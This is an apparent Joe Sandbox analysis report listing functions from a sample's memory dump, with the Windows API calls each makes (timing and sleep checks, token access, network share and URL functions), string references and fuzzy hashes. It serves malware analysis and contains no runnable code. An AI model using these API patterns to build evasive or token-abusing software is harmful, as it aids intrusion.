Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c4632a4660b45bcab75c92cd97b203b4ccbf3b44c270c3e32b36aa399529da00
Instruction ID: 7d697ee27c0fa2f50edce55a09ce4ac8bcff387172736c0978a160c5a9542ed3
Opcode Fuzzy Hash: c4632a4660b45bcab75c92cd97b203b4ccbf3b44c270c3e32b36aa399529da00
Instruction Fuzzy Hash: 1511C0B1209354AFEB248F24DC08FA27FFCEB44B50F10C569A61AD6191D7B8E904DB60

Function 0077B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B126

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 2baaa5a86f6eda4dce2fb6cb5688d83d2b8764af3ae19b7f42fc0220f531a6f9
Instruction ID: 9cfc8a4ed73d6a8acaf18e2a0a2f850d2751789e73b9098eef03c3e9077e4492
Opcode Fuzzy Hash: 2baaa5a86f6eda4dce2fb6cb5688d83d2b8764af3ae19b7f42fc0220f531a6f9
Instruction Fuzzy Hash: 0211AD70E0152CE7CF00AFE4E9697EEBB78FF4A351F408086D945B2181CB388A51CB55

Function 00772DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00772DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00772DD6
GetCurrentThreadId.KERNEL32 ref: 00772DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00772DE4

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ed97e9ec6dea7840fa5eca24d4b015007cfee81c602030e02bdb32be63740f17
Instruction ID: 5e52246df146b520392c58fd946df717b42ec19500565b711ebf8269865dbe1b
Opcode Fuzzy Hash: ed97e9ec6dea7840fa5eca24d4b015007cfee81c602030e02bdb32be63740f17
Instruction Fuzzy Hash: F5E092716012247BDB315B729C0EFEB3E6CEF83BA1F008015F109D10819AA8C841C6B1

Function 007A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00729639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296A2
Part of subcall function 00729639: BeginPath.GDI32(?), ref: 007296B9
Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007A8887
LineTo.GDI32(?,?,?), ref: 007A8894
EndPath.GDI32(?), ref: 007A88A4
StrokePath.GDI32(?), ref: 007A88B2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 264c68e86d32b17346fef68ce5a33bf84361f113f9ab0cdd0157090ff7da2845
Instruction ID: 5af2d0b8fdc43b2f7eadc4709215949313a1e45cc11b3ced30b144e275de48c3
Opcode Fuzzy Hash: 264c68e86d32b17346fef68ce5a33bf84361f113f9ab0cdd0157090ff7da2845
Instruction Fuzzy Hash: 9EF03A36046298FADB135F94AC0EFCE3A59AF4A310F44C100FA11651E2CB7D5511CBA9

Function 007298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007298CC
SetTextColor.GDI32(?,?), ref: 007298D6
SetBkMode.GDI32(?,00000001), ref: 007298E9
GetStockObject.GDI32(00000005), ref: 007298F1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: a1f37ed5990670bc7e213084769338620fa5c839cbf1cc8b4e6f515d5ea8f3b9
Instruction ID: 9c9aa6bc14fb10cbaf16ab1fda7488236249375bdec1974ae689e1d93bc762b6
Opcode Fuzzy Hash: a1f37ed5990670bc7e213084769338620fa5c839cbf1cc8b4e6f515d5ea8f3b9
Instruction Fuzzy Hash: A0E06531244284BADB225B74FC09BD83F50EB93375F14C219F6F6540E1C7794650DB10

Function 0077162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00771634
OpenThreadToken.ADVAPI32(00000000,?,?,?,007711D9), ref: 0077163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007711D9), ref: 00771648
OpenProcessToken.ADVAPI32(00000000,?,?,?,007711D9), ref: 0077164F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 7d6b5c69862bd7aaf3afd2b3a4d9a65eafb134faa5211911b7156684f2c590aa
Instruction ID: e8a0564065f0b8902758be5b0c911e8e7871284facb81b3d28a4355e838859f2
Opcode Fuzzy Hash: 7d6b5c69862bd7aaf3afd2b3a4d9a65eafb134faa5211911b7156684f2c590aa
Instruction Fuzzy Hash: 41E08631601211FBDB201FA49E0DB473B7CAF867D1F14C808F245C9080DA3C4540C759

Function 0076D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0076D858
GetDC.USER32(00000000), ref: 0076D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0076D882
ReleaseDC.USER32(?), ref: 0076D8A3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e3ea4095172ef440f9ba5e7a5ab663e791111ede09ade675f21337be0df286af
Instruction ID: 741e37b7bd531bf5342827510a8d55408346f31af3fa7cfcb7366c5d9b335626
Opcode Fuzzy Hash: e3ea4095172ef440f9ba5e7a5ab663e791111ede09ade675f21337be0df286af
Instruction Fuzzy Hash: 30E01AB1800205EFCB529FA0D80C66EBBB5FB49310F14D009E806E7350CB3C8941AF44

Function 0076D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0076D86C
GetDC.USER32(00000000), ref: 0076D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0076D882
ReleaseDC.USER32(?), ref: 0076D8A3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 50b0304b434d9e8c3ae73be0564f2a114ce7b55a78ca19472196491a8800b464
Instruction ID: 5df945cd1ef420ed72db4d1bbb160294ddd3e697e89e8e27357517169cb7e31b
Opcode Fuzzy Hash: 50b0304b434d9e8c3ae73be0564f2a114ce7b55a78ca19472196491a8800b464
Instruction Fuzzy Hash: F3E092B5800204EFCB56AFA4D80C66EBBB5BB89311B149449E94AE7360DB3C9942AF54

Function 00784D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00784ED4

Strings

*, xrefs: 00784E10
LPT, xrefs: 00784DFB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 97f2800513769cfc6775a9049fa391fa1c0080e53d728c771c22d5e2aaeaa7bf
Instruction ID: fae27524edb2e5a0e25ad67425236742fddd8e1c5f37204f6e101f43773634c2
Opcode Fuzzy Hash: 97f2800513769cfc6775a9049fa391fa1c0080e53d728c771c22d5e2aaeaa7bf
Instruction Fuzzy Hash: F5914E75A00205DFCB15EF58C484EAABBF1AF44304F19809DE50A9F3A2D779ED85CB91

Function 0073E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0073E30D

Strings

pow, xrefs: 0073E2E5, 0073E302

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7d97af43f3670dfdf40d75167aff79011ab0b6dd7ea388af68549a0dff0c55a1
Instruction ID: 62425bd3df622c85d76ea09a0da40b3339cc8f140b09778aa95f41f1cb9b65bb
Opcode Fuzzy Hash: 7d97af43f3670dfdf40d75167aff79011ab0b6dd7ea388af68549a0dff0c55a1
Instruction Fuzzy Hash: F4516E61E1D102D6EB197724CD457BA3B94EF40740F748E58F0D5422EBEB3D8C92DA46

Function 00797771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0076569E,00000000,?,007ACC08,?,00000000,00000000), ref: 007978DD

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

CharUpperBuffW.USER32(0076569E,00000000,?,007ACC08,00000000,?,00000000,00000000), ref: 0079783B

Strings

<s}, xrefs: 007977C8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s}
API String ID: 3544283678-4170637906
Opcode ID: c74b279ff15f80f2f8aa791cffba211776808f353b793f256735b78c3f845173
Instruction ID: 9178acf46b7abae1090fa73a1748172c2e1e973f7c00b95846b9bc74d9a879f7
Opcode Fuzzy Hash: c74b279ff15f80f2f8aa791cffba211776808f353b793f256735b78c3f845173
Instruction Fuzzy Hash: 67616E72924118EACF09EBE8DC95DFDB378FF14300B444126F542A7195EF38AA85CBA0

Function 0072E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0072E1B1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 5026c902a4c10ee3bc6088d928b7d91088613be3ac972038ecadc8e82fc4bdbe
Instruction ID: a48991b9de0feb51e804284b8db169ffbbcd1d7a5cb97d46efbc32101d8750ec
Opcode Fuzzy Hash: 5026c902a4c10ee3bc6088d928b7d91088613be3ac972038ecadc8e82fc4bdbe
Instruction Fuzzy Hash: 91510339500256DFDB15DF68D485AFA7BA8EF56310F248059FC929B2D0D63C9D82CBA0

Function 0072F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0072F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0072F2BB

Strings

@, xrefs: 0072F2AF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f5b02ca3b21e908836a503f0bfc741537a5c1b0a865304d532cdef6ba9fcc623
Instruction ID: e05e476af38151a7b1e083595fed35b6570ee2461905869f12b55a26f86f3841
Opcode Fuzzy Hash: f5b02ca3b21e908836a503f0bfc741537a5c1b0a865304d532cdef6ba9fcc623
Instruction Fuzzy Hash: 4D513572408744DBD320AF54D88ABABBBF8FB85700F81885DF199411A5EB3485A9CB66

Function 00795745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007957E0
_wcslen.LIBCMT ref: 007957EC

Strings

CALLARGARRAY, xrefs: 007957E6, 007957EB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 95bd77479a151d736339a525185db18c8386ae7a0f36f501dc73d8154fdf9f40
Instruction ID: eef349a70a4dc84639301aff7ceda9b1026a23149804fc9eb42a5413bf0f9a1e
Opcode Fuzzy Hash: 95bd77479a151d736339a525185db18c8386ae7a0f36f501dc73d8154fdf9f40
Instruction Fuzzy Hash: E2419F71A00219DFCF05DFA8D889DAEBBB5EF59360F108069E505A7391E7389D81CBA0

Function 0078D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0078D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0078D13A

Strings

|, xrefs: 0078D10B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 18d211c4a799619355fb361b34fada199b64f041c88f38b4a39364f50aa80844
Instruction ID: 5202152c998dc024829b626151db7a83d615b13db065ba85182a6efc76b21238
Opcode Fuzzy Hash: 18d211c4a799619355fb361b34fada199b64f041c88f38b4a39364f50aa80844
Instruction Fuzzy Hash: 17313E71D00219EBCF15EFA4CC89AEE7FB9FF04310F000119F915A61A6EB39A956CB50

Function 007A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007A3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007A365C

Strings

static, xrefs: 007A35BC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ca927a5e6c6a3912149901566db119be37a6458157d507adfe0bb444fa8b56cf
Instruction ID: 2e5b27c41cf8227dffd29bf12271bb8c4234f82a939d0459e84d9ff44fc01ab7
Opcode Fuzzy Hash: ca927a5e6c6a3912149901566db119be37a6458157d507adfe0bb444fa8b56cf
Instruction Fuzzy Hash: 85319E71500204AEDB14DF78DC85EFB73A9FF89720F009619F8A597280DA39ED91DB60

Function 007A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007A461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A4634

Strings

', xrefs: 007A458E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 534d68ac91c4d9046ea9c4e89b8317e686e2d8f5b2890ef6f209b0b469e7e371
Instruction ID: 6afff3624d9148166911c712d7070b223802c96edfe7cdcf1318e16d21980cce
Opcode Fuzzy Hash: 534d68ac91c4d9046ea9c4e89b8317e686e2d8f5b2890ef6f209b0b469e7e371
Instruction Fuzzy Hash: 49313875E01209AFDF14CFA9C981BDA7BB5FF8A300F10416AE904AB381D7B5A951CF90

Function 007A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007A327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A3287

Strings

Combobox, xrefs: 007A3249

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 438d93188bc79f62307dbe72b64fe797c0435ef4c4f51d509394f0e18d68ed1c
Instruction ID: ea65e3c8a5a57973b5c92c90f2dcaaa6aad6bc4ddaa8b02f8f3af3ee47ed7686
Opcode Fuzzy Hash: 438d93188bc79f62307dbe72b64fe797c0435ef4c4f51d509394f0e18d68ed1c
Instruction Fuzzy Hash: 67119371200208BFEF159F54DC85FAB376AEB9A364F104225F914972D0D6399D518760

Function 007A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0071600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
Part of subcall function 0071600E: GetStockObject.GDI32(00000011), ref: 00716060
Part of subcall function 0071600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A

GetWindowRect.USER32(00000000,?), ref: 007A377A
GetSysColor.USER32(00000012), ref: 007A3794

Strings

static, xrefs: 007A3757

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7318cadf632499e8189b08618e2d78f57a29e576389fd2a7e9ffd89cf568127a
